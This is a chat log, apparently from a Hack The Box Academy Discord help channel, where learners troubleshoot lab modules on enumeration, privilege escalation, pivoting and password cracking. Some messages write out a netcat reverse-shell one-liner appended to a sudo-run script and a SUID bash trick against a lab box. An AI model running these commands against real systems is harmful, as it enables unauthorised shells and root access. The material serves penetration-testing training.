try removing it from the /etc/hosts file and see if that makes a difference
i remember it being a bit odd at times
ok im trying
reset the machine, removed my hosts conf and added it again, now i have a different error
** server can't find <diffrent_ip>.in-addr.arpa: NXDOMAIN
what did you add now?
hosts file
new_ip inlanefreight.htb
what section is this again?
Module: Information Gathering - Web Edition
Subject: Active Subdomain Enumeration
task 1: Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
nslookup -type=NS inlanefreight.htb ip?
oh okey its working
i think maybe this machine have a problem
no
bcs before i used the command and it was not working
command -> nslookup -type=ANY inlanefreight.htb ip
works fine for me
you need to read the section again to understand the commands
because you need to add a -query type
yeap understand thx
hey guys, did someone here do the prolabs?
this channel isn't related to prolabs
I know but they say the role path is equivalent to some of the prolabs
eh i wouldn't say equivalent
i would say it helps but i wouldn't go as far as to say it's equivalent
i.e. CPTS covers 80% of what you'd find on Zephyr
but i wouldn't say it's 1::1
that's how it's exhibited
modules + certificate = prolab
yes; however there's more to those than what's in the courses
¯\_(ツ)_/¯
not to mention a few of those are outside of the course
that's Y I'm asking
& it's kinda annoying
but it being equivalent is kinda not correct to say
those modules will help you understand and adapt your techniques to attack the prolab
there has to be an easier way to get the shell code for the intro to assembly skill question1
Hello I am new
if you're still stuck dm me your code
Guys, do you think Mac M1 Pro is good for bug hunting and penetration testing??
I'm a software engineer and I'm using it for my daily full time work
I can't identify myself because of my alt account @rustic sage
Any admins here? Please?
I need help
just dm one
literally if you click the member list next to the search bar on desktop, if you don't already see the list on the right-hand side
Dude I alrdy know
plenty of mods are online rn
just chill and wait
i can see your name basilisk
@frosty spade he's trying to link his htb account
oh
his discord username is basilisk that doesn't mean that's his htb username
Basilisk is a Harry potter character fam
i know go team slytherin
while technically true, the Basilisk is a mythological creature from before Harry Potter
Malfoy gang
No wonder
pspssps @urban sage
It appeared since Salazar Slytherin sealed in the chambers of secrets
man whoever wrote this module should be Old Yeller'd, im going in circles, been at this for 4 days
skill issue
it is indeed, skill issue. the module is quite well written imo
i'm gonna loop myself into a rope 
its meant to be an introduction, what does an intro gotta do with skill? im starting in something, the question acts like ive been researching this for years
Hi everyone, please, if anyone knows where I can learn how to perform phishing assessments, if you have any resources or courses please recommend them
TIA
Phishing is bad
@rustic sageDm me.
Intro Assembly is very much an intro to the topic. You really don't need to know anything to follow it. It's not going to make you a pro.
It's a project bro just for testing user awareness
Module: Linux Priv Esc > Capabilities
Having some issues to override the /etc/passwd. I've identified that the vim.basic has the capability needed. When trying to edit the file in VIM I'm unable to exit, and doing it in a non-interactive way doesn't change the file...
Any ideas?
Gophish - An Open-Source Phishing Framework
My notes on the interactive mode: ||In vim, press i to enter interactive mode, remove the x from the first line, press Escape to leave interactive mode, and then save with :wq!||
@urban sage
For me the vim is non-responding when using Esc
I know tools but need proper Material to learn in depth
wq! doesn't save
Can anyone gimme link to discord developers
unless i'm missing something
google it
this channel isn't even remotely related
then it's likely invite only via admins of the server ¯\_(ツ)_/¯
meaning even if you were to be given an invite by some rando -> you'd be kicked
Are you calling it by running ||/usr/bin/vim.basic|| ?
i'm just stupid that's all
it finally worked to exit vim, this box seems a bit buggy
i forget how vim works sometimes
considering how often i use it, i should know more
worked for me 😮
ah
because wq should just work without it
sometimes you need to read what others wrote...
that's what threw me off
🙄 it threw me off at first
sorry was speaking to myself .P
I use wq! because I'm lazy and hate things. Its like saying "Die file die! I dont care what you were before!"
¯\_(ツ)_/¯
Currently Working on the Module "Windows Event Logs & Finding Evil". I am at the section "Analyzing Evil With Sysmon & Event Logs". When being connected via the RDP Session the Remote machine is suuuuper slow, barely usable. Anyone else had the same problem? Is this just how it is?
@next bronze for the win thanks for steering me to the right path instead of the cliff I was heading down
Switch to the tcp vpn
Thanks for being my absolute hero today by helping me out with this nooby stuff 🙏 . Works like a charm now
File Inclusion skills assessment
I've identified the working PHP wrapper but can't get around the appended extension, currently trying to find some sort of hidden page but the wordlists aren't finding any. Tips/ideas? Please nothing big, just need a small hint
cracking with hashcat, cracking common hashes. am i supposed to have any clue on which builtin rules i should be using? i've already tried some with the rockyou wordlist
if you just throw the hash at hashcat it'll auto id it
Yeah, I already had the mode, but I don't know if I should just try all the builtin hashcat rules until I find the right one or is there some clue I'm missing?
why are you using rules?
also see if there's a resources button for the module near the top of the screen
that may have a given pw list
DIGITAL FORENSICS Skills Assessment "Determine the IP address of the C2 Server"
Is there a better way than launching ||netstat || bunch of times and "hoping" to get it? I couldnt find this IP in ||arpcache ||
because with rockyou alone it stops with exhausted status and the hint says that i should use them
use hybrid mode maybe ¯\_(ツ)_/¯
idk i haven't done this but it seems weirdly vague; look at the examples maybe and try one of those?
best64 maybe
i've already tried best64, and i also thought about examples, but in this section there are none with hybrid attack or rules. Prior sections used leetspeak but that didnt work either. Im probably missing something or writing something wrong, because it seems too vague for a module exercise
thx anyway
y
(it helps to include that kind of info in your initial ask btw)
mb
best form for asking questions is:
Module name, Section name, What you're stuck on - what you've already tried
hello people, anyone else stuck on pivoting and tunneling? my packets get discarded outside receive window for the ptunnel section
Did you ever figure this out?
Hey can i ask, what do people do in HTB-A if you run into some very slow VMs when you connect to them?
switch vpn to tcp download if i'm not already using it; switch vpn region
Cool thanks ill give it a try! 🙂
hey, I'm in the footprinting module, "footprinting Lab - hard" section (the last one)
I scanned every port, TCP and UDP discovering pop3, Imap and snmp port open.
I used onesixtyone to find a community i could use braa on, but I have nothing as an output.
I'm almost sure I should find something based on what i saw on different forums, so I'm kinda clueless atm
my exact command
onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt <ip>
any help ? 😮
If you are doing academy stuff, are your VMs always just fast? Mine seems to lag quite a bit when e.g. backspacing in the terminal...
you should definitely get an output, the string is in the brackets []
(if not are you sure you're connected to the vpn?)
I'm using the parrot session atm since i couldn't get access to the snmp.txt list anyway, but ye I usually check for the vpn
I don't even have anything as an output, so no " [xxxx] "
I restarted the box without success too
then my second question is did you turn off the vpn before using the pwnbox?
:)
(also that wordlist is in SecLists so if it's not on your computer just download the SecLists repo)
well yeah, if you have the vpn running AND pwnbox running it causes network collisions
good luck with the next bits
imaps is my preferred way; but pop3s works just as well
Hey all, I'm really struggling on the Attacking Enterprise Network: Enumeration and Privilege Escalation. The proxy I set up with ssh dynamic port forwarding and foxy proxy stops working after like 5 minutes, so I tried setting it up with the teams.exe example with msfvenom, but don't know how to get that file and run it on the DEV01 host.
Anyone else have a painfully slow RDP connection today in the pwnbox?
Hi, can someone help with the logrotate privesc section? ||I execute the logrotate binary as explained, and when I invoke the logrotation myself by echo hello > access.log, the exploit code finishes as he should, and I still don't see the temp access.log in /etc/bash_completions.d/||
single > overwrites the file btw
I know, but it doesn't really matter for this purpose I think
i was doing other work, but i was able to use nmap scans and got the service running on port 22 and did a search for some exploits for that service which was OpenSSH 8.4p1 Debian 5+deb11u1. All i could find was a sid exploit which is exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection, there were a couple but this is the one i picked under sid, i forgot why, its been some hours since i was last on. when i use the show options cmd im not sure what options i need to set. i know it says that any option that has yes needs to be set but i followed along with the section and just changed the RHOSTS and LHOST to what was shown and used check but got back an error. Am I using the wrong exploit search or am i supposed to find an ip to connect RHOSTS to and then keep LHOSTS tun0? Dm me with any helpful information thanks!
this is for this
that's gonna get you nowhere
just visit the webpage that's given to you
also RHOSTS will be the given IP; RPORT will be the given port
since it's a public page (indicated by the public IP) then anything relying on a reverse shell is gonna go nowhere fast
Hey. im doing the nibble box and i keep getting this message when i try to run the monitor.sh to escalate privilege
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: /home/nibbler/personal/stuff/monitor.sh: command not found
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
LinEnum.sh monitor.sh wget-log
nibbler@Nibbles:/home/nibbler/personal/stuff$
i followed the instructions from the "Getting started module" and i cant figure out why this doesnt work for me. im unable to get root
okay. ill try and figure out what the website is
you don't have to try hard
you can put http://ip:port into the browser
:)
okay!! im most likely overthinking it then, thanks for the help!!
sudo bash monitor.sh
try
the exploit requires the full path
it asks me for a sudo password
iirc
yeah the sudo perms is for the full path
when you ls -la the file does have rwx perms yeah?
AAR okay it has -rw-r--r--
chmod +x it
I just did the Vulnerable Services section on the Linux priv esc module. If one would like to search for vulnerabilities, in services. Is it exploitDB the way to go, or are there any other good recommendations?
fu** lost my connection. brb
Searchsploit maybe
oh yes now i can run it but get this new problem
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
check your listener
Hey when doing the dancer course I get
/James.P> get flag.txt. Error opening local file flag.txt
i only got this:
```
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8443
Ncat: Listening on 0.0.0.0:8443
Ncat: Connection from 10.129.121.201.
Ncat: Connection from 10.129.121.201:44714.
```
no uid=(root) or anything
yeah it's funky sometimes; i forget if there's anything else you gotta do
strange
could you show the payload you use ?
dancer is a starting-point machine; follow instructions in #welcome and you'll have access to #starting-point - this channel is for academy modules
hmm i unzipped the personal.zip. appended the reverse shell code to the monitor.sh. i opened a connection via port 8080 and downloaded the LinEnum.sh file. made it executable and then ran it. i used a listener on port 8448 to make a reverse shell, ran the monitor.sh but that failed
you mean the revshell from the section
can you show the revshell you used
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
this one
this one for the monitor.sh : echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.122 8443 >/tmp/f' | tee -a monitor.sh
you should open port 8443 not 8080
the 8080 was to get linenum.sh
if they're following exactly from the section
aaah okay
i used 8080 to transfer the files
this is just a pic of my ip
ip
looks like you got a connection
you got a connection, but somehow it didn't last for too long
it looks like they sent an interrupt
yah i think i got it temporary, but i have not root
mybe this helps?
Does the script just execute your code? Otherwise just use chmod u+s /bin/bash
And then /bin/bash -p
did you kill you shell or what ?
killing the shell will definitely cause your second shell to drop
I mean why ^C ?
ya after some time i killed it in frustration
[ctrl-c] does that
if you kill your shell, you will lose your shell
i think that’s what it does
yah but i only killed it after several attempts
ik ik , I was trying to explain to him
try this
use a separate terminal for your listener
i did, i have 3 or something running
you're not showing any commands run with the 8443 listener
but still no root
just the 9443 one that launched monitor.sh
open your listener, then on another terminal sudo run monitor.sh
it should work
i take it you're doing the sanity check?
idk , I am just trying to help
same
i have this one
that's the connection
but i'm not seeing any commands run to check any code execution is the point
is that connection still open?
oh okay. maybe i did it wrong because on the other terminal i got this message and i thought, ah man not again, so i killed it
what message
from the 8443 connection; try running commands
that's what we're asking you to do
sh is interpreted line by line
will that work for this box?
i honestly do not know
If it executes code it will
i expected a uid=0(root) gid=0(root) groups=0(root) message in one of those terminals. maybe i fucked up at the end.
you won't get that unless you run id
the one in the image
You expect it to run that out of the blue?
strange
you need to run commands for it to execute commands
godda*** i was way too fast to kill it. i did not run the id
machines don't run code without you telling them to ¯\_(ツ)_/¯
the command you echoed into the monitor.sh was a reverse shell command
yah fu** i dont know why i expected it to.
yes
you don't need to censor yourself
comical as it is, fuck, shit, damn are all allowed here
what script?
Monitor.sh, the one you’re using sudo on
monitor.sh? is just a script that was in the zip file
Or py
oh thanks. i thought the bot will get pissed
Ok so you can edit monitor.sh?
Ok, just put chmod u+s /bin/bash in it
this is what's being followed
I’m on mobile, not logged in
btw this is the "getting started" module
it doesn't go over anything like sticky-bits
It’s a good trick to learn either way
its a monitoring script, and it is owned by our nibbler user and writeable. it comes from the personal.zip file
Did you get root
Put chmod u+s /bin/bash in the script
while it is; i think sticking to the module is good first
Then run the script with sudo
Is it telling you to do a revshell?
instead of throwing something completely different at it
hey guys, got a bit of a different question. i'm running kali linux on a vm. But its really really slow, i already put my video memory to max, i got 12 gb ram for it, 2 core processors. but still really slow, anyone any tips?
yes
Meh
at the end of the script?
don't use all of your hosts resources
You can put it near the start
I Think you already got root, you just need to run id
they're already in a shifty revshell to begin with - if they didn't fully upgrade the shell then a text editor is gonna be sketchy at best
it's interpreted line by line
yah i think getting started is hard. hehe steep learning curve
it's not hard
After that run it with the sudo command, and then ls -la /bin/bash to see if the perms changed
really, that makes it slow?
Yes
if you're using all of your hosts resources, then your host can't properly handle other things
causing heavily degraded performance
aaah alright understandable, thanks
Not sure if it’ll work since you put that revshell there now
going back to earlier: did you actually run commands on your 8443 listener
yah you might be right. i was too impatient
they'd have to put it earlier - since the only way to get it to run would be before the revshell
getting-started is a barebones sort of "here's some not-so complex things"
no i know its an easy box. just saying i think its a bit hard, without complaining tho. i just need to do this more often
i mean you're pretty much walked through it
just gotta make sure you pay more attention to the module
no. and thats where i made a mistake. i can see that now
Try starting point
youre absolutely right
and tbh taking notes is super important/key to your success
yes i am taking notes. also changing them. it helps. and this conversation here really helps to understand my mistakes
anyways. many thanks for the help. ill try the box again and use what you guys told me here. once again thank you all 🙏
thanks i will.
I am in the tunneling with ICMP echo; I am getting this error when I use the command
ssh -p2222 -lubuntu 127.0.0.1
I am running both server and client as sudo
Hey everyone, has anyone completed the Injection Attacks module? I need some help
Hey guys, I'm not sure where I need to post this... When I was going to the webshell, the target ip, in the Pivoting, Tunneling, and Port Forwarding - Skills Assessment module and theres this. Trying to upload a script, malware.
Is anyone available to pm about the Attacking Enterprise Network module?
it should fail regardless since the labs have no internet access
"Find another user with the "Do not require Kerberos pre-authentication setting" enabled. Perform an ASREPRoasting attack against this user, crack the hash, and submit their cleartext password as your answer."
https://academy.hackthebox.com/module/143/section/1276
I found the other user (there are only two users who meet this condition and the other one is the one that I submitted as the answer) and I found their password (using the tools mentioned in this section), but its not accepting my answer
hint: answer question 1
i found this one to be frustrating as well; but it's the user for question 1; this question is just bad
Module: ADVANCED XSS AND CSRF EXPLOITATION
Section: CORS Misconfigurations
This section has really worked me over. Can I PM someone with some Qs to help move my comprehension forward?
Lol
Whoever designed the labs for the footprinting modules, great job my fren
Rule 1
0x is my jams
Rule 34?
Especially the skill assessment section
Was a brainfuck to me but I really enjoyed solving it
yeah the enumeration, snmp, imaps n stuff was fun
Yeah
I think the attack itself somehow sounded unrealistic ||who the hell types their credentials in a script|| but it did a great job explaining the concepts
I love the laws and ethics included in the bio but clearly doesnt follow laws or have ethics
yeah in that case its kind of weird to make a script to change PW
would be better if the script was to fetch something from mysql, so it had the creds as plaintext to connect, this would fit better imo
Yeah prolly
But it was good "in design" ig
The module itself was really rich in information, grinding through those walls of text was insane
yes, it was exhausting to read all those. It would be cool if academy had some videos that you could just watch and kinda relax your brain and eyes for a bit while still consuming some information
what should I do now?
I COPE
real-time protection
yes I turned it off now its working
the idea is that the script is a password reset script
in Login Brute Forcing > Service Authentication Brute Forcing:
"Using what you learned in this section, try to brute force the SSH login of the user "b.gates" in the target server shown above. Then try to SSH into the server. You should find a flag in the home dir. What is the content of the flag?"
it says it's going to take 24 hours to run with the william.txt i created in the same way they did. did i do something wrong?
try attacking a different available service
or
lazagne.exe immediately closes its terminal window when finished, i don't have the time to read the output that fast, i tried to write the contents into a txt file so i can review it in time but it's empty :S
any ideas?
there's a tool called ssb that works really REALLY well
it just says SSH though in the question and i did everything as asked
look up a tool; ssb
it's actually goated apparently
🍗🍗🍗
yes !
this isn't a gen chat btw
read #welcome to find out how to access more of the server
any advice?
i shouldn't have to learn tools that weren't mentioned should i
just for the purposes of completing the content
i mean no; but knowing more tools is certainly helpful
i understand i can and it's cool to look at other tools but i feel like I've done something wrong if i follow it exactly as they told me to and it takes 24 hours to run
just because it says 24 hours doesn't mean it will actually be 24 hours
it really seemed like it would considering it was at like 40 requests a minute
that's just the time to go through the entire list
but yk you should get a hit way before then
yeah
Cybersecurity isn't about doing exactly as you were told
I know that
You need to try things and search more
if it was a box of something i was trying to crack i would agree but when being taught a tool to brute force ssh you'd expect it to run in reasonable time in the example given
you'll still get a hit before the lab dies ¯\_(ツ)_/¯
also who said you actually had to brute ssh? the question? pfft
Imagine reusing a password
imagine not checking for other services that utilize the same authentication source
a is my pwnbox
b is the rdp windows pivot box
c is the target
I am in the pivot box. I am trying to winrm session with target c, but I am getting this error
Incorrect
A is target, b is second box, c is final
but I am in the rdpoversocks section
Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.
this is the task
Check ipconfig on this device, it's not on the Jason subnet
I'm aware of the task
Which is why I'm telling you you missed something
hi, good night, anyone who already completed the Footprinting Lab - Hard and can answer my question?!
Only if you ask the question
=]
i want to understand why i should bruteforce snmp
Because that's one of the only services available that doesn't have auth
I found 3 interfaces: 1 lo, 1 to my pwnbox and the last to the 172.16.0.0 network
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::5b
IPv6 Address. . . . . . . . . . . : dead:beef::71ce:9ef2:b086:29ee
Temporary IPv6 Address. . . . . . : dead:beef::b5e2:4628:d04:b82f
Link-local IPv6 Address . . . . . : fe80::71ce:9ef2:b086:29ee%9
IPv4 Address. . . . . . . . . . . : 10.129.42.198
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:e928%9
10.129.0.1
Ethernet adapter Ethernet1 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::98f5:5ae5:5223:4310%4
IPv4 Address. . . . . . . . . . . : 172.16.5.150
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.16.5.1
Just a community string
Doesn't look like 172.16.6.x is in this output